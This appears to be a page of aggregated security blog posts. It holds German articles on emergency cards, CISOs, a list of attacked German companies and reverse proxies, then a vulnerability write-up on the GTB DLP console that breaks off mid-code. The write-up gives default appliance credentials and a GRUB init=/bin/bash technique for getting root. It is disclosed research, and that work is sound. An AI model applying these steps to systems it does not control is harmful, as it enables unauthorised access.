Normal view

There are new articles available, click to refresh the page.
Before yesterdayUncategorized

IT-Notfallkarte

25 March 2024 at 21:42

Ein Notfall und was ist jetzt zu tun?

Notfallkarten geben uns in unsicheren oder kritischen Situationen eine Richtline. Durch die IT-NOTFALLKARTE der HanseSecure erhalten alle Nutzer eine kompakte Handlungsanweisung.

Außerdem wird die Security Awareness des Unternehmens unimttelbar erhöht. Durch das begleitete Handeln erfahren sie Sicherheit und schützen sich und andere direkt vor weiteren fehlerhaften Entscheidungen und können die Ausweitung der Konsequenzen verhindern.

Gerade IT- Notfälle benötigen eine direkte und begleitete Handlungsrichtline, um so weitreichende Folgen zu verhindern. Darüber hinaus gilt es die Angst vor Fehlern zu nehmen, zu sensibilisieren und die Meldung von Auffälligkeiten zu bestärken. Die IT-NOTFALLKARTE sollte daher an in jedem Büro sichtbar angebracht und eine erklärende Einführung gegeben werden.

Der Beitrag IT-Notfallkarte erschien zuerst auf HanseSecure GmbH.

Die Rolle des CISO in der modernen Unternehmenssicherheit

By: kugler
15 March 2024 at 12:52

In einer Zeit, in der digitale Bedrohungen und Cyberangriffe zunehmen, wird die Rolle des Chief Information Security Officers (CISO) in Unternehmen immer wichtiger. Doch was genau macht ein CISO, und warum ist seine Position so entscheidend für die Sicherheit eines Unternehmens?

Die Bedeutung des CISO

Der CISO ist der oberste Verantwortliche für IT- und Cybersicherheit in einem Unternehmen. Während in den USA diese Position weit verbreitet ist, ist sie hierzulande noch eher die Ausnahme. Dennoch wird zunehmend klar, dass Unternehmen, die keine klare Verantwortlichkeit für IT-Sicherheit definieren, sich selbst unnötigen Risiken aussetzen.

Die Aufgaben des CISO

Die Kernaufgaben eines CISOs umfassen die Abwägung von Chancen und Risiken im Rahmen der Digitalisierung des Unternehmens. Dies beinhaltet den Schutz vor dem Verlust sensibler Informationen an Dritte sowie die Minimierung der Auswirkungen von IT-Systemausfällen. Ein effektiver CISO muss daher nicht nur technisches Know-how besitzen, sondern auch die Fähigkeit, komplexe Sachverhalte verständlich zu vermitteln und Sicherheitsmaßnahmen gegen möglichen Widerstand durchzusetzen.

Unterschiede zu anderen Sicherheitspositionen

Es ist wichtig, zwischen verschiedenen Sicherheitspositionen wie dem Chief Security Officer (CSO) und dem Chief Information Officer (CIO) zu unterscheiden. Während der CIO die strategische Richtung der Digitalisierung bestimmt, sind CSO und CISO für das Risikomanagement und der CISO speziell für die IT-Sicherheit zuständig. Eine klare Trennung und Spezialisierung dieser Aufgaben sind entscheidend für eine effektive Sicherheitsstrategie.

Die Herausforderungen für CISOs

Eine der größten Herausforderungen für CISOs besteht darin, das Vertrauen der Unternehmensleitung und der Mitarbeiter zu gewinnen. Oftmals sind CISOs nicht direkt in die Entscheidungsprozesse eingebunden und ihre Botschaften werden durch verschiedene Ebenen der Kommunikation verwässert. Dennoch ist es entscheidend, dass der CISO Zugang zur Führungsebene hat und als Bindeglied zwischen IT, Fachbereichen und Top-Management agieren kann.

Die Bedeutung von Schulungen und Weiterbildungen

Zusätzlich zu den technischen Fähigkeiten ist kontinuierliche Weiterbildung für CISOs und ihr Team unerlässlich. Die sich ständig weiterentwickelnde Landschaft der Cybersicherheit erfordert ein fortlaufendes Lernen und Anpassen an neue Bedrohungen und Technologien. Zertifizierungen wie CISSP (Certified Information Systems Security Professional) oder CISM (Certified Information Security Manager) können dabei helfen, Fachwissen und Kompetenzen zu validieren.

Entwicklung und Umsetzung von Sicherheitsrichtlinien

Ein weiterer wichtiger Aspekt der Arbeit eines CISOs ist die Entwicklung und Umsetzung von Richtlinien und Verfahren für die Informationssicherheit. Dies umfasst die Erstellung von Sicherheitsrichtlinien, die Überwachung der Einhaltung dieser Richtlinien sowie die Durchführung von Sicherheitsaudits und -tests, um Schwachstellen zu identifizieren und zu beheben.

Zusammenarbeit mit externen Partnern

CISOs arbeiten oft mit externen Partnern wie Regierungsbehörden, Strafverfolgungsbehörden und anderen Unternehmen zusammen, um Informationen über aktuelle Bedrohungen auszutauschen und gemeinsam an der Verbesserung der Cybersicherheit zu arbeiten. Diese Zusammenarbeit kann dazu beitragen, die Sicherheitsmaßnahmen eines Unternehmens zu stärken und potenzielle Angriffe zu vereiteln.

Fazit

In einer Welt, in der Cyberbedrohungen allgegenwärtig sind, ist die Rolle des CISO unverzichtbar für Unternehmen, die ihre Daten und Systeme schützen möchten. Durch eine klare Definition der Verantwortlichkeiten, kontinuierliche Weiterbildung und enge Zusammenarbeit mit anderen Sicherheitspartnern können CISOs dazu beitragen, die Sicherheitslage eines Unternehmens zu verbessern und es vor potenziell katastrophalen Folgen von Cyberangriffen zu bewahren.

Durch die Berücksichtigung dieser Punkte kann ein Unternehmen sicherstellen, dass es gut aufgestellt ist, um den stetig wachsenden Herausforderungen in der digitalen Welt zu begegnen.

Falls Du den Bedarf eines CISOs bei Euch im Unternehmen erkannt hast, können wir dich zu diesem Thema gerne ausführlicher beraten, oder als CISOaaS deine Sorgen direkt lösen. Buch dir jetzt ein kostenloses Erstgespräch!

Der Beitrag Die Rolle des CISO in der modernen Unternehmenssicherheit erschien zuerst auf HanseSecure GmbH.

Patch Tuesday Diffing: CVE-2024-20696 - Windows Libarchive RCE

11 March 2024 at 04:45
TL;DR This post will teach you how to patch diff CVE-2024-20696 (and indirectly CVE-2024-20697) from the January 2024 Patch Tuesday. This security patch was interesting as it wasn’t fixing native Microsoft software per se, rather patching an open-source library libarchive used by Windows to support compression and decompression functionality. Patch diffing is a powerful technique for unde...

Die alarmierende Zunahme von Cyberangriffen: Warum jedes Unternehmen gefährdet ist

By: kugler
1 March 2024 at 08:49

Cyberangriffe sind längst nicht mehr nur ein Problem für große Unternehmen oder Organisationen im Fokus der Öffentlichkeit. Auch mittelständische Unternehmen und scheinbar unbedeutende Branchen sind zunehmend im Visier von Cyberkriminellen. Die jüngsten Zahlen belegen eine alarmierende Zunahme von Angriffen auf Unternehmen jeder Größe und Branche.

Kein Unternehmen ist zu klein oder zu unbedeutend

Viele Unternehmen mögen glauben, dass ihre Sicherheitsmaßnahmen ausreichen oder dass sie aufgrund ihrer Größe oder Branche nicht attraktiv für Hacker sind. Diese Annahmen sind jedoch gefährlich falsch. Jedes Unternehmen, unabhängig von seiner Größe oder Branche, besitzt wertvolle Daten, die für Cyberkriminelle von Interesse sind. Sei es Kundendaten, geistiges Eigentum oder sensible Geschäftsinformationen – für Hacker gibt es keine zu kleinen oder unwichtigen Ziele.

Die verheerenden Folgen von Cyberangriffen

Die Auswirkungen von Cyberangriffen können verheerend sein. Im Jahr 2023 wurden mehr als 58 deutsche Unternehmen Opfer von Cyberattacken, wobei die Dunkelziffer vermutlich noch höher liegt. Die meisten Angriffe erfolgten mittels Ransomware, was zu Betriebsstörungen, Umsatzeinbußen, hohen Kosten für die Datenwiederherstellung und Reputationsschäden führte.

Die Bedrohung im Jahr 2024

Auch im Jahr 2024 ist die Gefahr durch Cyberkriminelle hoch. Eine Vielzahl deutscher Unternehmen wurde bereits Opfer von Cyberangriffen, darunter namhafte Unternehmen wie ODAV AG und Transdev. Die Liste der betroffenen Unternehmen ist lang und reicht vom Mittelstand bis hin zu kritischen Infrastrukturen.

Die Notwendigkeit einer robusten Sicherheitsstrategie

Angesichts dieser Bedrohungslage ist es unerlässlich, dass Unternehmen eine robuste Sicherheitsstrategie implementieren. Dazu gehört nicht nur die Investition in technische Sicherheitsmaßnahmen wie Firewalls und Antivirensoftware, sondern auch die Sensibilisierung der Mitarbeiter für das Thema Cybersicherheit und die Implementierung von Sicherheitsrichtlinien und Verfahren.

Fazit

Die zunehmende Zahl von Cyberangriffen macht deutlich, dass kein Unternehmen immun gegen Cyberbedrohungen ist. Es ist von entscheidender Bedeutung, dass Unternehmen aller Größen und Branchen die Bedrohung ernst nehmen und proaktiv Maßnahmen ergreifen, um sich vor Cyberangriffen zu schützen. Nur so können sie ihre Daten, ihre Systeme und ihre Geschäftskontinuität langfristig sichern.

UnternehmenWannWasQuelle
ODAV AGJanuar 24CSO
TransdevJanuar 24CSO
Junghans-Wolle/ Pro IdeeDezember 23RansomwareCSO
Allgaier AutomotiveDezember 23filstalwelle.de
Erfo BekleidungswerkDezember 23RansomwareCSO
KaDeWeNovember 23RansomwareCSO
Bauer AGCSO
Südwestfalen ITOktober 23RansomwareCSO
Motel OneOktober 23RansomwareCSO
HäffnerOktober 23RansomwareExplodingsecurity
HochsauerlandWasser, Hochsauerland EnergieSeptember/Oktober2023RansomwareCSO
degenia Versicherungsdienst AGSeptember/Oktober 2023CSO
MedgateAugust/September 2023Medgate
Kendrion Kuhnke MalenteAugust 23CSO
Trinkwasserverband StadeAugust 23CSO
WildeboerJuli 23RansomwareCSO
SoftProjektJuli 23RansomwareSoftProjekt
IT-Dienstleister der BarmerJuni 23Software-SchwachstelleCSO
VerivoxJuni 23Software-SchwachstelleCSO
Medizinischer DienstJuni 23CSO
Deutsche LeasingJuni 23CSO
Verlagsgruppe VRMMai 23CSO
Hosting-Dienstleister von DenaMai 23RansomwareCSO
United HosterMai 23RansomwareCSO
Dienstleister von Heineking MediaMai 23CSO
Black Cat NetworksMai 23RansomwareCSO
GITAIMai 23RansomwareCSO
Maxim GroupMai 23RansomwareCSO
Lux AutomationRansomwareCSO
Bilstein GruppeApril 23RansomwareCSO
Stürtz MaschinenbauApril 23RansomwareDSGVO Portal
Badische StahlwerkeApril 23CSO
JobradRansomwareCSO
BitmarckApril 23CSO
LürssenApril 23RansomwareCSO
EvotecApril 23CSO
ÜstraMärz 23CSO
BIG direktMärz 23Ruhr Nachrichten
MaternaMärz 23CSO
SAF HollandMärz 23CSO
MatthäiMärz 23RansomwareCSO
Energieversorgung FilstalMärz 23DDoSCSO
Rheinmetall, NWMärz 23DDoSCSO
Steico, BYMärz 23n.a.CSO
Smart InsurTech, BEFebruar 23n.a.Smart InsurTech
Albert Ziegler, BWFebruar 23n.a.CSO
Unternehmen in Bayern, BYFebruar 23RansomwarePolizei Bayern
Kapellmann und Partner Rechtsanwälte, NWFebruar 23RansomwareKapellmann
Häfele, BWFebruar 23RansomwareCSO
Stadtwerke Karlsruhe, BWFebruar 23RansomwareCSO
Dürr, BWFebruar 23n.a.CSO
Bayerischer Rundfunk, BYFebruar 23PhishingCSO
Geze, BWFebruar 23n.a.Geze
Wisag Dienstleistungsholding, HEFebruar 23n.a.Frankfurter Allgemeine Zeitung
Flughafen Hamburg, HHJanuar 23DDoSHamburger Abendblatt
Plüsch-Tierheim, NWJanuar 23n.a.CSO
Sky Deutschland, BYJanuar 23n.a.Digital Fernsehen
Bitmarck, NWJanuar 23n.a.CSO
Fritzmeier Group, BYJanuar 23n.a.CSO
Adesso, NWJanuar 23n.a.CSO
Unternehmen in Kaiserslautern, RPJanuar 23Social EngineeringCSO
IBB Business Team, BEDezember 22RansomwareIBB Business Team
SSI Schäfer Shop, RPDezember 22n.a.Schäfer Shop LinkedIn
Thyssenkrupp, NRWDezember 22n.a.CSO
H-Hotels, HEDezember 22n.a.H-Hotels
Meyer & Meyer, NIDezember 22n.a.CSO
Rosenschon Partnerschaft, BYDezember 22n.a.Bayreuter Tagblatt
Deutsche Klassenlotterie Berlin, BEDezember 22n.a.Berliner Kurier
Land Brandenburg Lotto, BBDezember 22n.a.RBB 24
Lotto-Toto Sachsen-Anhalt, STDezember 22n.a.MDR
Nordwest Lotto Schleswig-Holstein, SHDezember 22n.a.Focus
Lotto Rheinland-Pfalz, RPDezember 22n.a.SWR
Technolit, HEDezember 22n.a.Technolit Facebook
T-Mobile, NWNovember 22n.a.CSO
Landau Bedia, BENovember 22n.a.Landau Media
Bisping & Bisping, BYNovember 22n.a.Nürnberger Nachrichten
Richard Wolf, BWNovember 22RansomwareRichard Wolf
Prophete, NWNovember 22n.a.CSO
Oase, NRWOktober 22n.a.Oase
Aurubis, HHOktober 22n.a.CSO
Enercity, NIOktober 22n.a.CSO
Deutsche Presse Agentur, HHOktober 22RansomwareCSO
Metro, NRWOktober 22n.a.CSO
Heilbronner Stimme, BWOktober 22RansomwareCSO
Wilken Software Group, BWOktober 22RansomwareCSO
Convista, NRWOktober 22Zero DayConvista
Hipp, BYOktober 22n.a.BR24
Caritasverband München und Freising, BYSeptember 22RansomwareCSO
Elabs, HEAugust 22n.a.Elabs
Medi, BYAugust 22n.a.CSO
IHK, deutschlandweitAugust 22DDoSCSO
Semikron, BYAugust 22RansomwareCSO
Continental, NIAugust 22n.a.CSO
Autodoc, BEAugust 22n.a.Skoda Community
Saller-Bau, THAugust 22n.a.Thüringer Allgemeine
Ista, NWJuli 22n.a.CSO
ASG, NIJuli 22n.a.CSO
Weidmüller, NWJuli 22n.a.Neue Westfälische
Helinet, NWJuli 22DDoSWestfälischer Anzeiger
Knauf, BYJuni 22n.a.Knauf
Bizerba, BWJuni 22n.a.Schwarzwälder Bote
Apetito, NWJuni 24n.a.CSO
Count + Care, HEJuni 24RansomwareWissenschaftsstadt Darmstadt
Bauverein, HEJuni 24RansomwareFrankfurter Rundschau
Heag und Heag Mobilo, HEJuni 22RansomwareFrankfurter Rundschau
FES, HEJuni 22RansomwareCSO
Entega, HEJuni 22RansomwareCSO
Stadtreinigung Kassel, HEJuni 22n.a.Welt
SDZ Druck und Medien, BWMai 22n.a.Schwäbische Post
Jakob Becker, RPMai 22RansomwareCSO
Posteo, BEMai 22DDoSCSO
AGCO, BYMai 22RansomwareAGCO
Ludwig Freytag,NIMai 22RansomwareNDR
CWS, NWMai 22n.a.Westfalen Blatt
Sixt, BYApril 22n.a.CSO
Donau Stadtwerke Dillingen-Lauingen, BYApril 22n.a.Augsburger Allgemeine
Reitzner, BYApril 22n.a.Augsburger Allgemeine
AHS, HHApril 22n.a.Airliners
IMA Schelling Group, NWApril 22n.a.Neue Westfälische
Deutsche Windtechnik, HBApril 22RansomwareCSO
Perbit, NWApril 22RansomwareCSO
KSB, STApril 22n.a.rheinpfalz.de
Fraunhofer-Institut, STApril 22RansomwareCSO
TÜV Nord Group, NIApril 22n.a.TÜV Nord Group
Nordex, HHMärz 22n.a.Nordex
Welcome Hotels, HEMärz 22n.a.Welcome Hotels
Stollwerck, THMärz 22n.a.MDR
Elobau, BWMärz 22RansomwareElobau
Bauking, NWMärz 22RansomwareWestfalenpost
Rosneft, BEMärz 22n.a.Welt
TST, RPMärz 22n.a.SWR
Trützschler, NWMärz 22RansomwareWDR
Funke Mediengruppe, NWFebruar 22BotsDie Zeit
Klopotek, BEFebruar 22RansomwareCSO
Schultze & Braun Rechtsanwaltsgesellschaft, BWFebruar 22Zero DaySchultze & Braun
Otto Dörner, HHFebruar 22RansomwareSVZ
Wisag Dienstleistungsholding, HEJanuar 22n.a.Wisag
Golfclub Hofgut Praforst, HEJanuar 22Ransomware­­­Osthessen News
Thalia Bücher, NWJanuar 22Brute ForceTarnkappe
Unfallkasse Thüringen, THJanuar 22RansomwareUnfallkasse Thüringen
Oiltanking GmbH, HHJanuar 22n.a.Handelsblatt
Hacks an Deutschen Unternehmen, 2022-2024

Jedes Unternehmen ist gefährdet, unabhängig von seiner Größe. Wenn Sie wissen möchten, wie Sie nicht zukünftig auf dieser Liste landen, vereinbaren sie ein kostenloses Erstgespräch!

Der Beitrag Die alarmierende Zunahme von Cyberangriffen: Warum jedes Unternehmen gefährdet ist erschien zuerst auf HanseSecure GmbH.

Proxies: Die unsichtbaren Helfer des Internetverkehrs

By: kugler
15 February 2024 at 10:29

Warum ein Reverse Proxy ein Muss für Ihre IT-Sicherheit ist

TL;DR:

Proxy-Server fungieren als Vermittler zwischen Clients und Servern, verbessern die Sicherheit, optimieren die Leistung und ermöglichen eine effiziente Ressourcennutzung. Es gibt zwei Hauptarten: Forward-Proxys, welche ausgehenden Verkehr von Clients zum Internet routen und Reverse-Proxys, welche eingehenden Verkehr von Clients zu Backend-Servern lenken.

Was ist ein Forward-Proxy:

Ein Forward-Proxy ist ein Server, der zwischen Clients und dem Internet positioniert ist und den ausgehenden Verkehr der Clients routet. Dieser agiert im Namen der Clients, indem er deren Anfragen weiterleitet und ihre Identität verbirgt. Dadurch ermöglicht der Forward-Proxy die Kontrolle des Internetzugriffs, die Durchsetzung von Sicherheitsrichtlinien und die Verbesserung der Privatsphäre.

In einer herkömmlichen Internetkommunikation wenden sich Benutzer (User A & User B) an den Server (Server A & B), indem sie Anfragen direkt an diese senden und von ihnen Antworten erhalten. Wenn jedoch ein Forward Proxy eingerichtet ist, senden Benutzer ihre Anfragen stattdessen zuerst an diesen Proxy. Der Forward Proxy leitet dann die Anfrage an die entsprechenden Server weiter und empfängt von ihnen die Antworten, die er dann an die Benutzer zurücksendet.

Was ist ein Reverse-Proxy

Ein Reverse-Proxy ist ein Server, welcher vor Backend-Servern positioniert ist und den eingehenden Verkehr von Clients an diese Server weiterleitet. Dieser fungiert als Vermittler zwischen den Clients und den Backend-Servern, verbessert die Sicherheit, optimiert die Lastverteilung und bietet Funktionen wie SSL-Terminierung und Caching.

Normalerweise kommunizieren Benutzer (User A & B) direkt mit Servern (Server A & B), wobei Anfragen von den Benutzern an die Server gesendet werden und die Server direkt antworten. Wenn jedoch, ein Reverse-Proxy verwendet wird, gehen alle Benutzeranfragen zuerst an den Reverse-Proxy. Dieser leitet die Anfragen an die Server weiter und empfängt die Antworten. Anschließend leitet der Proxy die entsprechenden Antworten zurück an die Benutzer.

Unterschiede zwischen Forward und Reverse Proxy:

Die Hauptunterschiede liegen in ihrer Ausrichtung und Funktionsweise: Ein Forward-Proxy leitet den Verkehr von innen nach außen weiter, während ein Reverse-Proxy den Verkehr von außen nach innen lenkt.

Forward-Proxys werden typischerweise von Clientgeräten verwendet, um auf das Internet zuzugreifen, während Reverse-Proxys häufig in Serverinfrastrukturen eingesetzt werden, um den eingehenden Verkehr zu verwalten.

Einsatzgebiete des Reverse Proxy:

Grundsätzlich dient ein Reverse Proxy als zusätzliche Sicherheitsschicht, um Angriffe abzuwehren, sensible Daten zu schützen und Zugriffsbeschränkungen zu implementieren.

  • Flexibilität bei der Authentifizierungsmethode
    Der Reverse Proxy ermöglicht die Implementierung verschiedener Authentifizierungsmethoden wie HTTP Basic Auth, Digest Auth, OAuth, LDAP-Integration usw. Je nach den Anforderungen der Anwendung und den Sicherheitsrichtlinien des Unternehmens können geeignete Authentifizierungsmethoden ausgewählt und konfiguriert werden.
  • Verzeichnisse sperren
    Durch die Konfiguration des Reverse Proxys können bestimmte Verzeichnisse oder Dateien auf dem Server hinter dem Proxy gesperrt werden, um unerwünschten Zugriff zu verhindern und sensible Informationen zu schützen.
  • IP-Eingrenzung
    Der Reverse Proxy kann den Zugriff basierend auf IP-Adressen einschränken, um nur bestimmten IP-Bereichen oder vertrauenswürdigen Quellen den Zugriff zu gestatten und potenzielle Angreifer abzuwehren.
  • SSL-Terminierung und Caching
    Der Reverse-Proxy kann SSL/TLS-Entschlüsselung durchführen und häufig angeforderte Inhalte zwischenspeichern, um die Antwortzeiten zu verbessern.
  • Einfache Konfiguration und Skalierbarkeit
    Die Implementierung von Authentifizierung auf Ebene des Reverse Proxys erleichtert die Konfiguration und Skalierung der Sicherheitsinfrastruktur. Da der Proxy die Anfragen abfängt, können Sicherheitsrichtlinien und Authentifizierungseinstellungen zentral verwaltet und auf alle eingehenden Anfragen, unabhängig von den dahinterliegenden Servern, angewendet werden.
  • Schutz vor Angriffen und Missbrauch
    Der Reverse Proxy schützt die Backend-Server vor Brute-Force-Angriffen, unbefugtem Zugriff und anderen Formen von Missbrauch. Durch die Verwendung von Captchas, Zwei-Faktor-Authentifizierung und anderen Sicherheitsmechanismen kann die Sicherheit weiter erhöht werden.
  • Load Balancing
    Einige Reverse-Proxys können auch als Lastenausgleich fungieren und den Datenverkehr auf mehrere Server verteilen. Dies kann sicherstellen, dass kein einzelner Server überlastet wird und Benutzeranfragen ohne Verzögerung bearbeitet werden können.

Warum sich der Einsatz für Ihr Unternehmen lohnt:

  • Ihr Unternehmen profitiert von der verbesserten Sicherheit, Leistung und Skalierbarkeit, die ein Reverse-Proxy bietet.
  • Sie können ihre Serverressourcen effizienter nutzen, Angriffe abwehren und die Benutzererfahrung verbessern.
  • Durch die Implementierung eines Reverse-Proxys können Unternehmen ihren IT-Sicherheitsstandard erhöhen und somit auch die Kundenzufriedenheit steigern.

Bei der Implementierung unterstützen wir sie jederzeit.

Ausblick:

In unserem nächsten Blog-Beitrag beleuchten wir, wie Sie ganz einfach und kostenlos Ihren eigenen Reverse Proxy Server einrichten. Das dürfen Sie nicht verpassen!

Der Beitrag Proxies: Die unsichtbaren Helfer des Internetverkehrs erschien zuerst auf HanseSecure GmbH.

Proxies: Die unsichtbaren Helfer des Internetverkehrs

By: kugler
15 February 2024 at 09:41

Warum ein Reverse Proxy ein Muss für Ihre IT-Sicherheit ist

TL;DR:

Proxy-Server fungieren als Vermittler zwischen Clients und Servern, verbessern die Sicherheit, optimieren die Leistung und ermöglichen eine effiziente Ressourcennutzung. Es gibt zwei Hauptarten: Forward-Proxys, welche ausgehenden Verkehr von Clients zum Internet routen und Reverse-Proxys, welche eingehenden Verkehr von Clients zu Backend-Servern lenken.

Was ist ein Forward-Proxy:

Ein Forward-Proxy ist ein Server, der zwischen Clients und dem Internet positioniert ist und den ausgehenden Verkehr der Clients routet. Dieser agiert im Namen der Clients, indem er deren Anfragen weiterleitet und ihre Identität verbirgt. Dadurch ermöglicht der Forward-Proxy die Kontrolle des Internetzugriffs, die Durchsetzung von Sicherheitsrichtlinien und die Verbesserung der Privatsphäre.

In einer herkömmlichen Internetkommunikation wenden sich Benutzer (User A & User B) an den Server (Server A & B), indem sie Anfragen direkt an diese senden und von ihnen Antworten erhalten. Wenn jedoch ein Forward Proxy eingerichtet ist, senden Benutzer ihre Anfragen stattdessen zuerst an diesen Proxy. Der Forward Proxy leitet dann die Anfrage an die entsprechenden Server weiter und empfängt von ihnen die Antworten, die er dann an die Benutzer zurücksendet.

Was ist ein Reverse-Proxy

Ein Reverse-Proxy ist ein Server, welcher vor Backend-Servern positioniert ist und den eingehenden Verkehr von Clients an diese Server weiterleitet. Dieser fungiert als Vermittler zwischen den Clients und den Backend-Servern, verbessert die Sicherheit, optimiert die Lastverteilung und bietet Funktionen wie SSL-Terminierung und Caching.

Normalerweise kommunizieren Benutzer (User A & B) direkt mit Servern (Server A & B), wobei Anfragen von den Benutzern an die Server gesendet werden und die Server direkt antworten. Wenn jedoch, ein Reverse-Proxy verwendet wird, gehen alle Benutzeranfragen zuerst an den Reverse-Proxy. Dieser leitet die Anfragen an die Server weiter und empfängt die Antworten. Anschließend leitet der Proxy die entsprechenden Antworten zurück an die Benutzer.

Unterschiede zwischen Forward und Reverse Proxy:

Die Hauptunterschiede liegen in ihrer Ausrichtung und Funktionsweise: Ein Forward-Proxy leitet den Verkehr von innen nach außen weiter, während ein Reverse-Proxy den Verkehr von außen nach innen lenkt.

Forward-Proxys werden typischerweise von Clientgeräten verwendet, um auf das Internet zuzugreifen, während Reverse-Proxys häufig in Serverinfrastrukturen eingesetzt werden, um den eingehenden Verkehr zu verwalten.

Einsatzgebiete des Reverse Proxy:

Grundsätzlich dient ein Reverse Proxy als zusätzliche Sicherheitsschicht, um Angriffe abzuwehren, sensible Daten zu schützen und Zugriffsbeschränkungen zu implementieren.

  • Flexibilität bei der Authentifizierungsmethode
    Der Reverse Proxy ermöglicht die Implementierung verschiedener Authentifizierungsmethoden wie HTTP Basic Auth, Digest Auth, OAuth, LDAP-Integration usw. Je nach den Anforderungen der Anwendung und den Sicherheitsrichtlinien des Unternehmens können geeignete Authentifizierungsmethoden ausgewählt und konfiguriert werden.
  • Verzeichnisse sperren
    Durch die Konfiguration des Reverse Proxys können bestimmte Verzeichnisse oder Dateien auf dem Server hinter dem Proxy gesperrt werden, um unerwünschten Zugriff zu verhindern und sensible Informationen zu schützen.
  • IP-Eingrenzung
    Der Reverse Proxy kann den Zugriff basierend auf IP-Adressen einschränken, um nur bestimmten IP-Bereichen oder vertrauenswürdigen Quellen den Zugriff zu gestatten und potenzielle Angreifer abzuwehren.
  • SSL-Terminierung und Caching
    Der Reverse-Proxy kann SSL/TLS-Entschlüsselung durchführen und häufig angeforderte Inhalte zwischenspeichern, um die Antwortzeiten zu verbessern.
  • Einfache Konfiguration und Skalierbarkeit
    Die Implementierung von Authentifizierung auf Ebene des Reverse Proxys erleichtert die Konfiguration und Skalierung der Sicherheitsinfrastruktur. Da der Proxy die Anfragen abfängt, können Sicherheitsrichtlinien und Authentifizierungseinstellungen zentral verwaltet und auf alle eingehenden Anfragen, unabhängig von den dahinterliegenden Servern, angewendet werden.
  • Schutz vor Angriffen und Missbrauch
    Der Reverse Proxy schützt die Backend-Server vor Brute-Force-Angriffen, unbefugtem Zugriff und anderen Formen von Missbrauch. Durch die Verwendung von Captchas, Zwei-Faktor-Authentifizierung und anderen Sicherheitsmechanismen kann die Sicherheit weiter erhöht werden.
  • Load Balancing
    Einige Reverse-Proxys können auch als Lastenausgleich fungieren und den Datenverkehr auf mehrere Server verteilen. Dies kann sicherstellen, dass kein einzelner Server überlastet wird und Benutzeranfragen ohne Verzögerung bearbeitet werden können.

Warum sich der Einsatz für Ihr Unternehmen lohnt:

  • Ihr Unternehmen profitiert von der verbesserten Sicherheit, Leistung und Skalierbarkeit, die ein Reverse-Proxy bietet.
  • Sie können ihre Serverressourcen effizienter nutzen, Angriffe abwehren und die Benutzererfahrung verbessern.
  • Durch die Implementierung eines Reverse-Proxys können Unternehmen ihren IT-Sicherheitsstandard erhöhen und somit auch die Kundenzufriedenheit steigern.

Bei der Implementierung unterstützen wir sie jederzeit.

Ausblick:

In unserem nächsten Blog-Beitrag beleuchten wir, wie Sie ganz einfach und kostenlos Ihren eigenen Reverse Proxy Server einrichten. Das dürfen Sie nicht verpassen!

 

Der Beitrag Proxies: Die unsichtbaren Helfer des Internetverkehrs erschien zuerst auf HanseSecure GmbH.

A christmas tale: pwning GTB Central Console (CVE-2024-22107 & CVE-2024-22108)

23 January 2024 at 00:00

Dear Fellowlship, today’s homily is about the paradox of how adding security solutions to your infrastructure increases the vulnerable surface.

Prayers at the foot of the Altar a.k.a. disclaimer

This article was written the 28th of December when the vulnerabilities were reported to the vendor. It was only edited to add the CVE identifiers.

I want to highlight how fast they created an issue in their TODO for next release and how fast they fixed the issues. I wish more companies were so inclined to take it seriously like this did. Kudos to their developers!

Overture

Every time I see a new software during a Red Team operation I annotate it on my Obsidian so when I have free time, or I am a bit sad, I pick one of the list and try to pwn it. As I spent christmas holidays alone at 1000Km from my family both conditions were met. I decided to target a DLP software called “GTB” that is advertised in their website as the Top #1 Data Loss Prevention solution. Usually pwning a DLP console means pwning the whole domain because it gives you access to tons of stuff: credentials, execute code via agents in workstations, read/send mails, etc.

Top 1 DLP solution
Top 1 DLP Solution

The trial version of “GTB Central Console” is a ISO that can be downloaded from their website.

1st movement: The Jailbreak

I installed the ISO (it is a custom CentOS 7) in a VM with VirtualBox, and I set a bridged network to access the exposed ports from my laptop. After the installation it prompts you for credentials:

Login
Asking for credentials. The "pwned" is because I took the screenshot after pwning it :).

I found the credentials in a turkish website (wizard / password!@@@). The user wizard executes a configuration program instead of a shell when you log in:

Configuration
Program to configure the platform.

At this point I had two potential paths to follow:

  • A) Try to find a command injection to jailbreak it. In a black box can be boring to throw payloads until something works.
  • B) Try to get a root shell modifying Grub2.

I always try the second option because is the fastest. In this case the grub was password protected so I could not edit the options directly. But do not worry: I just booted a Ubunutu Live CD to replace the grub password for one known by me:

mkdir /mnt/pwned
mount /dev/sda1 /mnt/pwned

Then user.cfg was edited to replace the hash with one generated with grub-mkpasswd-pbkdf2. Once the password was replaced the VM was rebooted and when the OS selection appeared I hitted e to enter in the edit mode. Then I proceeded to modify the linux16... line to add the well-known init=/bin/bash at the end. Finish with crtl + x and you would have a root shell :D.

root shell
Unrestricted root shell :D

My intention was to access this box using SSH from my laptop, so I wanted to create a new user and give it sudo privileges. But at this stage the OS is loaded as read-only, so I needed to remount the / as rw:

mount -o remount,rw /

At this point is I just added the user and gave it sudo perms. Finally I just rebooted the VM.

Validating the new user
Validating the new user

I checked that the SSH service was accesible via the bridged-interface (as curious note the SSH server is at port 1122 instead of 22):

psyconauta@insulanova:~/Research/dlp|⇒  nmap  192.168.0.18 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-27 14:26 CET
Nmap scan report for insulatergum (192.168.0.18)
Host is up (0.00011s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     nginx
443/tcp  open  ssl/http nginx
1122/tcp open  ssh      OpenSSH 7.4 (protocol 2.0)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds

Connect and enjoy the jailbreak:

Jailbreaked!
Jailbreaked!

Now we can comfortably analyze all the file system and the services running on this platform.

2nd movement: The Dance of the Single Quote

When you visit the web interface you can see that 3 requests are automatically fired:

Initial requests
Initial requests

These requests are done before any authentication is made so these files are good candidates to peek an eye to look for vulnerabilities triggeables without auth. The ccapi.php file:

<?php
require_once dirname(__FILE__) . '/../lib/util/simplemongophp/Db.php';
require_once dirname(__FILE__) . '/../lib/PureApi/CCApi.class.php';

$pureApiObject = new CCApi();

$request = $_REQUEST;
$action  = $request['action'] ?? '';

header('Content-Type: text/json');

if (is_array($action)) {
    // multi action API
    $result = [];
    foreach ($action as $actionItem) {
        $realActionItem = $actionItem;
        $actionItem     .= 'Action';
        if (($actionItem != 'Action') && method_exists($pureApiObject, $actionItem)) {
            $result[$realActionItem] = $pureApiObject->$actionItem($request);
        } else {
            $result[$realActionItem] = [
                'error' => $actionItem . ' not defined!',
            ];
        }
    }
    echo json_encode($result, JSON_UNESCAPED_UNICODE);
} else {
    $action .= 'Action';
